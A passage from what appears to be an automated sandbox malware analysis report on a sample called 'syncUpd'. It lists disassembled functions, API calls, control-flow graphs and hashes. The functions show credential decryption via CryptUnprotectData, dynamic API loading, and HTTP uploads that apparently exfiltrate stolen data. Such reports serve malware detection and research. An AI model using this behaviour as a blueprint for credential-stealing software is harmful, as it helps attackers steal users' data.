                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 362916592-0
                                                                                                                                                                                                                                  • Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                                  • Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00409540 Relevance: 4.5, APIs: 3, Instructions: 49memoryencryptionCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2068576380-0
                                                                                                                                                                                                                                  • Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
                                                                                                                                                                                                                                  • Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00416240 Relevance: 231.7, APIs: 110, Strings: 22, Instructions: 674libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BEA0), ref: 0041625D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BE80), ref: 00416275
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071D538), ref: 0041628E
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071D568), ref: 004162A6
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071D580), ref: 004162BE
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071D598), ref: 004162D7
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,007200F8), ref: 004162EF
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071D5B0), ref: 00416307
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071D5C8), ref: 00416320
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071D6B8), ref: 00416338
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071D640), ref: 00416350
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BE20), ref: 00416369
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BE00), ref: 00416381
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BF00), ref: 00416399
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BF20), ref: 004163B2
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071D5E0), ref: 004163CA
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,007245D0), ref: 004163E2
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00720378), ref: 004163FB
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BC80), ref: 00416413
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,007245E8), ref: 0041642B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,007246D8), ref: 00416444
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00724738), ref: 0041645C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,007245A0), ref: 00416474
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BF40), ref: 0041648D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00724600), ref: 004164A5
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00724510), ref: 004164BD
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00724690), ref: 004164D6
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,007246A8), ref: 004164EE
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00724468), ref: 00416506
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00724528), ref: 0041651F
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,007246C0), ref: 00416537
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,007246F0), ref: 0041654F
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00724498), ref: 00416568
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071FE38), ref: 00416580
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,007245B8), ref: 00416598
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00724540), ref: 004165B1
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BF60), ref: 004165C9
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,007244F8), ref: 004165E1
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BF80), ref: 004165FA
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00724588), ref: 00416612
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00724558), ref: 0041662A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BFA0), ref: 00416643
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071C3E0), ref: 0041665B
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00724570,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00724750,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00724678,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00724480,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00724618,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00724708,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00724630,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00724648,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75290000,0071C320), ref: 0041670A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75290000,00724660), ref: 00416722
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75290000,0071D968), ref: 0041673A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75290000,00724720), ref: 00416753
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75290000,0071C040), ref: 0041676B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73440000,007202B0), ref: 00416790
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73440000,0071C140), ref: 004167A9
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73440000,00720148), ref: 004167C1
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73440000,007244B0), ref: 004167D9
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73440000,007244C8), ref: 004167F2
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73440000,0071C340), ref: 0041680A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73440000,0071C300), ref: 00416822
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73440000,007244E0), ref: 0041683B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(752C0000,0071C120), ref: 0041685C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(752C0000,0071C2C0), ref: 00416874
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(752C0000,00724780), ref: 0041688D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(752C0000,00724798), ref: 004168A5
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(752C0000,0071C0E0), ref: 004168BD
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,0071FF18), ref: 004168E3
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,00720170), ref: 004168FB
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,00724768), ref: 00416913
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,0071C160), ref: 0041692C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,0071C360), ref: 00416944
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,0071FFB8), ref: 0041695C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,007247B0), ref: 00416982
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,0071C060), ref: 0041699A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,0071D908), ref: 004169B2
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,00724828), ref: 004169CB
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,007247C8), ref: 004169E3
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,0071C0A0), ref: 004169FB
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,0071C240), ref: 00416A14
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,007247E0), ref: 00416A2C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,007247F8), ref: 00416A44
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,0071C200), ref: 00416A66
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,00724810), ref: 00416A7E
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,00724960), ref: 00416A96
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,00724AB0), ref: 00416AAF
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,00724B58), ref: 00416AC7
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75450000,0071C2E0), ref: 00416AE8
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75450000,0071C0C0), ref: 00416B01
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75DA0000,0071C280), ref: 00416B22
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75DA0000,007249A8), ref: 00416B3A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,0071C260), ref: 00416B60
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,0071C180), ref: 00416B78
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,0071C380), ref: 00416B90
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,00724918), ref: 00416BA9
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,0071C1A0), ref: 00416BC1
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,0071C100), ref: 00416BD9
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,0071C3C0), ref: 00416BF2
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,0071C1C0), ref: 00416C0A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75AF0000,00724888), ref: 00416C2B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75AF0000,0071D958), ref: 00416C44
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75AF0000,00724A98), ref: 00416C5C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75AF0000,007248E8), ref: 00416C74
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75D90000,0071C080), ref: 00416C96
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6C630000,00724870), ref: 00416CB7
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6C630000,0071C2A0), ref: 00416CCF
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6C630000,007249C0), ref: 00416CE8
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6C630000,00724A68), ref: 00416D00
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                  • String ID: Gr$(Er$(Hr$0Fr$8Gr$@Er$HFr$PGr$XEr$XKr$`Fr$`Ir$hDr$hGr$hJr$pEr$pHr$xFr$Dr$Er$Gr$Hr
                                                                                                                                                                                                                                  • API String ID: 2238633743-1839564293
                                                                                                                                                                                                                                  • Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                                                                                                                                                  • Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00404DC0 Relevance: 56.6, APIs: 22, Strings: 10, Instructions: 569stringnetworkmemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 179 404dc0-404ee1 call 416da0 call 404470 call 4155a0 call 4170d0 lstrlen call 4170d0 call 4155a0 call 416d40 * 5 InternetOpenA StrCmpCA 202 404ee3 179->202 203 404eea-404eee 179->203 202->203 204 404ef4-405007 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416f20 call 416fb0 call 416ea0 call 416e00 * 3 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 203->204 205 405578-40560a InternetCloseHandle call 415070 * 2 call 417040 * 4 call 416da0 call 416e00 * 5 call 413220 call 416e00 203->205 204->205 268 40500d-40501b 204->268 269 405029 268->269 270 40501d-405027 268->270 271 405033-405065 HttpOpenRequestA 269->271 270->271 272 40556b-405572 InternetCloseHandle 271->272 273 40506b-4054e5 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap HeapAlloc call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA call 415070 271->273 272->205 427 4054ea-405514 InternetReadFile 273->427 428 405516-40551d 427->428 429 40551f-405565 InternetCloseHandle 427->429 428->429 431 405521-40555f call 416fb0 call 416ea0 call 416e00 428->431 429->272 431->427
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                    • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                    • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                    • Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0071DC68), ref: 00404ED9
                                                                                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,0071DC78,?,00726330,00000000,00000000,00400100,00000000), ref: 00405058
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                    • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,0071DB98,00000000,?,0071FCE8,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 004053FF
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00405417
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040542C
                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00405443
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040546A
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040547C
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 004054A5
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405565
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405572
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040557C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
                                                                                                                                                                                                                                  • String ID: ------$"$"$"$--$------$------$------$0cr$8me
                                                                                                                                                                                                                                  • API String ID: 2633831070-1632710934
                                                                                                                                                                                                                                  • Opcode ID: f9c74c8bd5b162ad2116968dca9dbc9c19983fe21bb72298214c6830a7feb551
                                                                                                                                                                                                                                  • Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9c74c8bd5b162ad2116968dca9dbc9c19983fe21bb72298214c6830a7feb551
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00405610 Relevance: 49.5, APIs: 19, Strings: 9, Instructions: 493networkstringmemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 438 405610-4056cb call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 453 4056d4-4056d8 438->453 454 4056cd 438->454 455 405c70-405c98 InternetCloseHandle call 4170d0 call 4094a0 453->455 456 4056de-405856 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 453->456 454->453 465 405cd7-405d3f call 415070 * 2 call 416da0 call 416e00 * 5 call 413220 call 416e00 455->465 466 405c9a-405cd2 call 416e20 call 416fb0 call 416ea0 call 416e00 455->466 456->455 540 40585c-40586a 456->540 466->465 541 405878 540->541 542 40586c-405876 540->542 543 405882-4058b5 HttpOpenRequestA 541->543 542->543 544 405c63-405c6a InternetCloseHandle 543->544 545 4058bb-405bdc call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap HeapAlloc call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA 543->545 544->455 654 405be2-405c0c InternetReadFile 545->654 655 405c17-405c5d InternetCloseHandle 654->655 656 405c0e-405c15 654->656 655->544 656->655 657 405c19-405c57 call 416fb0 call 416ea0 call 416e00 656->657 657->654
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                    • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                    • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0071DC68), ref: 004056C3
                                                                                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,0071DB68,00000000,?,0071FCE8,00000000,?,0041E0D8), ref: 00405B1E
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00405B2F
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00405B47
